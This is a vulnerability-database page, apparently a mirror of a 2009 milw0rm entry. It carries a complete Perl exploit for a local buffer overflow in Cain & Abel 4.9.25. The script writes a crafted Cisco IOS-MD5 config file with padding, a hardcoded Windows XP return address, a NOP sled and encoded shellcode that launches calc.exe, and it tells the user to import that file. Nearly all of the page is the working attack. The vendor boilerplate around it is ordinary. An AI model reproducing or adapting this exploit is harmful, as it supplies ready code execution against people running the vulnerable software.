Lucene search
K

Cain Abel 4.9.25 - Cisco IOS-MD5 Local Buffer Overflow

🗓️ 07 Jan 2009 00:00:00Reported by send9Type 
exploitpack
 exploitpack
👁 17 Views

Cain & Abel 4.9.25 - Cisco IOS-MD5 Local Buffer Overflow for Cracke

Code
#!perl -w
# Simple overflow for Cain & Abel v4.9.25 (and below?)
# This script will output a file; import this file as a 
# config file under Cracker -> Cisco IOS-MD5 Hashes
#
# If Cain crashes but calc.exe isn't run, change $eip to reflect
# your system.
#
# send9 /at/ chiseclabs.com

use strict;

my $eip = "\xD8\x69\x83\x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
my $nop = "\x90" x 4;
my $pad = "A" x 100;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54".
"\x42\x50\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x57".
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x48".
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48".
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x38".
"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x32\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33".
"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47".
"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x49".
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36".
"\x4e\x46\x43\x46\x50\x32\x45\x56\x4a\x37\x45\x56\x42\x30\x5a";

my $b00m = $pad . $eip . $nop . $shellcode;

open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing\n";
print BOF $b00m;
close(BOF);

print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.\n";

# milw0rm.com [2009-01-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jan 2009 00:00Current
1.1Low risk
Vulners AI Score1.1
17